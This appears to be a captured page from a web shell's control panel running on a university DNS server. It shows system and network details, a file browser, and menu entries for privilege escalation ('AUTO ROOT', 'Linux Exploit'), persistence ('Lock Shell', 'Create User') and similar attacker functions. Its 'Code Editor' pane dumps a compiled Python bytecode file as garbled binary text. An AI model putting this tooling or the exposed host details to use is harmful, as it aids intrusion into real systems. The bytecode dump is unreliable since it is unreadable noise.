Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
function /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
as_string.cpython-310.pyc
846
B
-rw-r--r--
caller_is.cpython-310.pyc
4.41
KB
-rw-r--r--
__init__.cpython-310.pyc
139
B
-rw-r--r--
strfns.cpython-310.pyc
2.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : caller_is.cpython-310.pyc
o ̴6bU � @ st d dl Z d dlZG dd� de j�ZG dd� de j�ZG dd� de j�ZG dd � d e j�Ze� e� e� e� dS ) � Nc �* e Zd ZdZ� fdd�Zddd�Z� ZS )�CallerIsa� Check the calling function's name. Usage: $_caller_is (NAME [, NUMBER-OF-FRAMES]) Arguments: NAME: The name of the function to search for. NUMBER-OF-FRAMES: How many stack frames to traverse back from the currently selected frame to compare with. If the value is greater than the depth of the stack from that point then the result is False. The default is 1. Returns: True if the function's name at the specified frame is equal to NAME.c � t t| ��d� d S )N� _caller_is)�superr �__init__��self�� __class__� �//usr/share/gdb/python/gdb/function/caller_is.pyr &